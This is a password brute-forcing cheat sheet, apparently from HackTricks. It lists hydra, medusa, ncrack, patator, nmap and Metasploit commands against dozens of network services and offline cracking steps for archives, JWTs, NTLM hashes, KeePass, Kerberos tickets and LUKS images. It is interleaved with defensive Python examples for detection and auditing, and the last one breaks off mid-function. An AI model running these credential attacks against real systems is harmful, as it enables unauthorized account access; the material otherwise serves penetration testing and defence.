Brute Force - CheatSheet
Support HackTricks and get benefits!

Default Credentials

Search Google for the default credentials of the technology in use, or try these links:

Create your own Dictionaries

Find as much information about the target as you can and generate a custom dictionary. Tools that may help:

Crunch

```bash
crunch 4 6 0123456789ABCDEF -o crunch1.txt # From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)

# Placeholders for the -t pattern:
# @ Lower case alpha characters
# , Upper case alpha characters
# % Numeric characters
# ^ Special characters including space
crunch 6 8 -t ,@@^^%%
```

Cewl

```bash
cewl example.com -m 5 -w words.txt
```

CUPP

Generate passwords based on your knowledge of the victim (names, dates...)
```bash
python3 cupp.py -h
```

pydictor

Wordlists

Services

Ordered alphabetically by service name.

AFP

```bash
nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run
```

AJP

```bash
nmap --script ajp-brute -p 8009 <IP>
```

Cassandra

```bash
nmap --script cassandra-brute -p 9160 <IP>
```

CouchDB

```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
```

Docker Registry

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
```

Elasticsearch

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
```

FTP

```bash
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
```

HTTP Generic Brute

WFuzz

HTTP Basic Auth

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for HTTPS
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
```

HTTP - Post Form

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for HTTPS
```
For HTTPS you have to change "http-post-form" to "https-post-form".

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
```

IMAP

```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
```

IRC

```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
```

ISCSI

```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
```

JWT

```bash
# hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

# https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

# John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

# https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>

# https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

# https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

# https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
```
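Every tool above works offline because an HS256 signature is just HMAC-SHA256 over `header.payload` with the server's secret: anyone holding one token can test guesses without touching the server. The following is an added example (not code from HackTricks or from any of the tools listed; it also covers the local "JWT" section further down) that shows the verification step a service performs, pins the algorithm so an `alg: none` header cannot bypass it, and enforces the RFC 7518 minimum of 256 bits of key material, which is the mitigation against the dictionary attacks listed here. The payload and secrets in it are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import secrets

# RFC 7518 section 3.2: HS256 keys must be at least 256 bits. Shorter,
# human-chosen secrets are exactly what offline dictionary tools find.
MIN_HS256_KEY_BYTES = 32


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Build a compact HS256 JWT: the signature is HMAC-SHA256(secret, header.payload)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode("ascii")
    signature = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(signature)}"


def verify_hs256(token: str, secret: bytes) -> bool:
    """Verify a token. Any structural problem or a bad signature yields False.
    Nothing here needs the server, which is why a weak secret can be guessed
    offline against a single captured token."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        signature = b64url_decode(sig_b64)
    except ValueError:  # wrong number of segments, bad base64 or bad JSON
        return False
    # Pin the algorithm on the verifier side: the token's own header must not
    # be allowed to select "none" or a different algorithm.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return False
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode("ascii"), hashlib.sha256).digest()
    # Constant-time comparison so the check does not leak how many bytes matched.
    return hmac.compare_digest(expected, signature)


def secret_is_strong(secret: bytes) -> bool:
    """Key policy: at least 256 bits of key material."""
    return len(secret) >= MIN_HS256_KEY_BYTES


def generate_secret() -> bytes:
    """A secret no wordlist contains: 32 random bytes from the OS CSPRNG."""
    return secrets.token_bytes(MIN_HS256_KEY_BYTES)


if __name__ == "__main__":
    weak, strong = b"password", generate_secret()          # constructed sample secrets
    token = sign_hs256({"sub": "alice", "role": "user"}, weak)
    print("verifies with the correct secret:", verify_hs256(token, weak))
    print("weak secret passes policy:", secret_is_strong(weak))
    print("generated secret passes policy:", secret_is_strong(strong))
```

A service that stores its HS256 secret in configuration should generate it with `generate_secret()` (or an equivalent CSPRNG call) and reject anything shorter at start-up; once the secret has at least 256 random bits, every wordlist-based tool in this section is useless against its tokens.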

LDAP

```bash
nmap --script ldap-brute -p 389 <IP>
```

MQTT

```bash
ncrack mqtt://127.0.0.1 --user test -P /root/Desktop/pass.txt -v
```

Mongo

```bash
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
```

MySQL

```bash
# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> [-f] -t <threads> -M mysql # -f stops medusa on the first successful attempt
```

OracleSQL

```bash
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

# msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

# msf2: this module relies on nmap and sometimes fails for no obvious reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

# nmap sometimes fails for no obvious reason when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
```
In order to use oracle_login with patator you need to install:
```bash
pip3 install cx_Oracle --upgrade
```
Offline OracleSQL hash bruteforce (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
```bash
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
```

POP

```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
```

PostgreSQL

```bash
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres
ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
```

PPTP

You can download the .deb package to install from https://http.kali.org/pool/main/t/thc-pptp-bruter/
```bash
sudo dpkg -i thc-pptp-bruter*.deb # Install the package
cat rockyou.txt | thc-pptp-bruter -u <Username> <IP>
```

RDP

```bash
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
```

Redis

```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra -P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
```

Rexec

```bash
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
```

Rlogin

```bash
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
```

Rsh

```bash
hydra -L <Username_list> rsh://<Victim_IP> -v -V
```

Rsync

```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
```

RTSP

```bash
hydra -l root -P passwords.txt <IP> rtsp
```

SNMP

```bash
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```

SMB

```bash
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
```

SMTP

```bash
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V # Port 587 for SMTP with SSL
```

SOCKS

```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
```

SQL Server

```bash
# Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> # Use domain if needed. Be careful with the number of passwords in the list: this could lock accounts
msf> use auxiliary/scanner/mssql/mssql_login # Be careful, you can lock accounts. If you have a domain, set it and use USE_WINDOWS_AUTHENT
```

SSH

```bash
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
```
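Each of the online tools in this section (hydra, ncrack, medusa, patator) leaves the same trace on the target: a burst of `Failed password` lines from one source, often across several usernames. The following is an added detection example, not code from HackTricks or from any of those tools. It parses syslog-style sshd lines, counts failures per source address in a sliding window, and flags sources that exceed a threshold; the log lines and the hostname `bastion` are constructed for the example, and the threshold and window are assumed values a defender would tune.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd lines in syslog format (not real log data).
SAMPLE_AUTH_LOG = """\
Mar 10 13:00:01 bastion sshd[2001]: Failed password for root from 10.0.0.5 port 40001 ssh2
Mar 10 13:00:03 bastion sshd[2002]: Failed password for root from 10.0.0.5 port 40002 ssh2
Mar 10 13:00:05 bastion sshd[2003]: Failed password for invalid user admin from 10.0.0.5 port 40003 ssh2
Mar 10 13:00:08 bastion sshd[2004]: Failed password for invalid user admin from 10.0.0.5 port 40004 ssh2
Mar 10 13:00:12 bastion sshd[2005]: Failed password for invalid user test from 10.0.0.5 port 40005 ssh2
Mar 10 13:00:15 bastion sshd[2006]: Failed password for root from 10.0.0.5 port 40006 ssh2
Mar 10 13:05:00 bastion sshd[2007]: Failed password for alice from 10.0.0.9 port 50001 ssh2
Mar 10 13:05:04 bastion sshd[2008]: Accepted password for alice from 10.0.0.9 port 50001 ssh2
"""

# Matches the classic syslog timestamp, then sshd's failure message. "invalid user"
# marks guesses for accounts that do not exist, a typical sign of a wordlist.
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(lines):
    """Yield (timestamp, username, source_ip) for every failed-password line."""
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            # Syslog timestamps carry no year; strptime fills in 1900, which is
            # fine for computing differences within one log file.
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            yield ts, m.group("user"), m.group("ip")


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Flag sources with at least `threshold` failures inside any `window_seconds` window."""
    per_ip = defaultdict(list)
    for ts, user, ip in parse_failures(lines):
        per_ip[ip].append((ts, user))
    alerts = {}
    for ip, events in per_ip.items():
        events.sort()
        times = [t for t, _ in events]
        start, peak = 0, 0
        # Two-pointer sliding window over the sorted failure times.
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = {
                "failures": len(events),
                "peak_in_window": peak,
                "users": sorted({u for _, u in events}),  # many users = password spraying
            }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()).items():
        print(f"{ip}: {info['failures']} failures, peak {info['peak_in_window']}/60s, users {info['users']}")
```

Run it against a real file with `detect_bruteforce(open("/var/log/auth.log"))`; the `users` list distinguishes a single-account attack from a spray, and the same two-pointer logic transfers to any service on this page once the regex is swapped for that daemon's failure message.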

Telnet

```bash
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
```

VNC

```bash
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> -u root -P /root/Desktop/pass.txt -M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:<PORT>
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0
nmap -sV --script vnc-brute -p 5900 <IP>

# Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
```

Winrm

```bash
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
```

Local

Online cracking databases

Check these before trying to brute-force a hash.

ZIP

```bash
# sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
```
```bash
zip2john file.zip > zip.john
john zip.john
```
```bash
# $zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt # Incremental attack
```

7z

```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
```
```bash
# Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
```

PDF

```bash
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
# pdf2john didn't work well; john didn't know which hash type it was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
```

JWT

```bash
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack

# Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

# Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john # It does not work with Kali-John
```

NTLM cracking

```bash
# Format: USER:ID:LM_HASH:NT_HASH:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```
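The `USER:ID:LM:NT:::` format above is what a defender also reads when auditing a credential store for the conditions that make the cracking commands cheap: LM hashes still stored (LM is trivially crackable), accounts with the empty-password NT hash, and several accounts sharing one NT hash (password reuse, so one cracked hash unlocks all of them). The following is an added audit example, not code from HackTricks or from john/hashcat. The two empty-password constants are the well-known LM and NT hashes of the empty string; the sample dump and all other hash values in it are constructed.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty password. The "empty" LM value also appears
# for every account when LM hash storage is disabled (the recommended state).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed pwdump-style sample (USER:RID:LM:NT:::); the non-empty hash values are made up.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:0123456789abcdef0123456789abcdef:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
bob:1106:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""


def parse_pwdump(lines):
    """Parse USER:RID:LM:NT::: lines into records; reject anything that is not 32 hex chars."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            raise ValueError(f"malformed hash for user {user}")
        records.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return records


def audit_pwdump(lines):
    """Report the three conditions that make a dump cheap to crack."""
    records = parse_pwdump(lines)
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {
        # A real LM hash means the password is at most 14 chars, upper-cased and split in two halves.
        "lm_stored": [r["user"] for r in records if r["lm"] != EMPTY_LM],
        "empty_password": [r["user"] for r in records if r["nt"] == EMPTY_NT],
        # Same NT hash means same password (NT hashes are unsalted).
        "shared_nt": {h: users for h, users in by_nt.items() if len(users) > 1},
    }


if __name__ == "__main__":
    for key, value in audit_pwdump(SAMPLE_DUMP.splitlines()).items():
        print(f"{key}: {value}")
```

On a real dump, a non-empty `lm_stored` list means the `NoLMHash` policy is not in force, and `shared_nt` groups are the first candidates for a forced password change, because one successful `-m 1000` run against a shared hash opens every account in the group.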

Keepass

```bash
sudo apt-get install -y kpcli # Install keepass tools like keepass2john
keepass2john file.kdbx > hash # The KeePass database only uses a password
keepass2john -k <file-password> file.kdbx > hash # The KeePass database also requires a key file
# The KeePass database can use a password and/or a key file as credentials; if it uses both, you need to provide both to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

Kerberoasting

```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```

LUKS image

Method 1

```bash
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ # You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```

Method 2

```bash
cryptsetup luksDump backup.img # Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 # Payload offset + 1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ # You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
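Method 2 works because everything hashcat needs sits in front of the payload: the LUKS1 header records the cipher, hash and PBKDF2 iteration count of every key slot, and the `count=4097` in the dd line is just the payload offset plus one sector. The following is an added example (not code from HackTricks, cryptsetup or hashcat) that parses a LUKS1 header, derives that byte count from the header instead of assuming 4096, and reports key slots whose iteration count is low enough to make a wordlist attack cheap; the header it builds is constructed for the example (zero salts and digests, no real key material) and the 100 000-iteration threshold is an assumed audit value.

```python
import struct

LUKS_MAGIC = b"LUKS\xba\xbe"
KEY_ENABLED, KEY_DISABLED = 0x00AC71F3, 0x0000DEAD
SECTOR = 512
# LUKS1 on-disk header, all big-endian: magic, version, cipher name, cipher mode,
# hash spec, payload offset (in sectors), key bytes, MK digest, MK salt,
# MK iterations, UUID. Eight key slots follow.
PHDR_FMT = ">6sH32s32s32sII20s32sI40s"
# Key slot: active flag, PBKDF2 iterations, salt, key material offset, AF stripes.
SLOT_FMT = ">II32sII"
PHDR_LEN = struct.calcsize(PHDR_FMT) + 8 * struct.calcsize(SLOT_FMT)  # 592 bytes


def build_sample_header(payload_offset=4096, slot_iterations=(2000, 400000)):
    """Constructed LUKS1 header for this example; zero salts and digests, no real key material."""
    phdr = struct.pack(PHDR_FMT, LUKS_MAGIC, 1, b"aes", b"xts-plain64", b"sha256",
                       payload_offset, 64, b"\x00" * 20, b"\x00" * 32, 1000, b"constructed-uuid")
    slots = b""
    for i in range(8):
        active = KEY_ENABLED if i < len(slot_iterations) else KEY_DISABLED
        iters = slot_iterations[i] if i < len(slot_iterations) else 0
        slots += struct.pack(SLOT_FMT, active, iters, b"\x00" * 32, 8 + i * 256, 4000)
    return phdr + slots


def is_luks1(blob: bytes) -> bool:
    return len(blob) >= PHDR_LEN and blob[:6] == LUKS_MAGIC and blob[6:8] == b"\x00\x01"


def parse_header(blob: bytes) -> dict:
    if not is_luks1(blob):
        raise ValueError("not a LUKS1 header")
    f = struct.unpack_from(PHDR_FMT, blob, 0)

    def cstr(b: bytes) -> str:  # NUL-padded ASCII field
        return b.split(b"\x00", 1)[0].decode("ascii")

    slots = []
    base, size = struct.calcsize(PHDR_FMT), struct.calcsize(SLOT_FMT)
    for i in range(8):
        active, iters, _salt, _offset, _stripes = struct.unpack_from(SLOT_FMT, blob, base + i * size)
        slots.append({"slot": i, "active": active == KEY_ENABLED, "iterations": iters})
    return {"version": f[1], "cipher": cstr(f[2]), "mode": cstr(f[3]), "hash": cstr(f[4]),
            "payload_offset": f[5], "key_bytes": f[6], "mk_iterations": f[9], "slots": slots}


def bytes_needed_for_offline_check(header: dict) -> int:
    """Header and key material plus the payload's first sector: (payload offset + 1) sectors,
    the same count the dd command above uses (bs=512 count=4097 for an offset of 4096)."""
    return (header["payload_offset"] + 1) * SECTOR


def weak_slots(header: dict, min_iterations: int = 100_000) -> list:
    """Active key slots whose PBKDF2 iteration count keeps a dictionary attack cheap."""
    return [s["slot"] for s in header["slots"] if s["active"] and s["iterations"] < min_iterations]


if __name__ == "__main__":
    hdr = parse_header(build_sample_header())
    print(hdr["cipher"], hdr["mode"], hdr["hash"], "payload offset", hdr["payload_offset"])
    print("bytes to extract:", bytes_needed_for_offline_check(hdr))
    print("weak key slots:", weak_slots(hdr))
```

For a real image, feed `parse_header(open("backup.img", "rb").read(PHDR_LEN))`; a low iteration count in `weak_slots` is the defender's signal to re-enroll that slot (`cryptsetup luksChangeKey` with a higher `--iter-time`), since the iteration count is the only knob that raises the attacker's cost per guess in the hashcat line above.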

Mysql

```bash
# John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
```

PGP/GPG Private key

```bash
gpg2john private_pgp.key # This will generate the hash, save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
```

DPAPI Master Key

Open Office Pwd Protected Column

If you have an xlsx file with a column protected by a password, you can remove the protection:
  • Upload it to Google Drive and the password will be removed automatically
  • To remove it manually:
```bash
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512" hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xlsx .
```
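The reason the protection can simply be deleted is that `sheetProtection` is an editing lock, not encryption: the cell values sit in plaintext XML inside the zip, and the password hash only gates the UI. A workbook that is actually encrypted is not a zip at all (it is an OLE compound file that Excel cannot open without the password). The following is an added example (not code from HackTricks) that tells the two cases apart and lists, per sheet, whether a `sheetProtection` element is present and how many cell values remain readable; the minimal workbook it builds is constructed for the example and reuses the `sheetProtection` attributes shown above.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {"s": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}


def build_sample_xlsx() -> bytes:
    """Constructed minimal workbook: sheet1 carries the sheetProtection element shown above, sheet2 does not."""
    sheet1 = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        '<sheetData><row r="1"><c r="A1"><v>42</v></c><c r="B1" t="str"><v>secret</v></c></row></sheetData>'
        '<sheetProtection algorithmName="SHA-512" '
        'hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" '
        'saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>'
        "</worksheet>"
    )
    sheet2 = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        '<sheetData><row r="1"><c r="A1"><v>7</v></c></row></sheetData></worksheet>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder part, enough for this audit
        z.writestr("xl/worksheets/sheet1.xml", sheet1)
        z.writestr("xl/worksheets/sheet2.xml", sheet2)
    return buf.getvalue()


def audit_sheet_protection(xlsx_bytes: bytes) -> dict:
    """Distinguish an encrypted workbook (not a zip; values unreadable without the password)
    from one that only uses sheet protection (values readable, hash gates the UI only)."""
    if not zipfile.is_zipfile(io.BytesIO(xlsx_bytes)):
        return {"encrypted_container": True, "sheets": []}
    sheets = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        for name in sorted(z.namelist()):
            if not (name.startswith("xl/worksheets/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(z.read(name))
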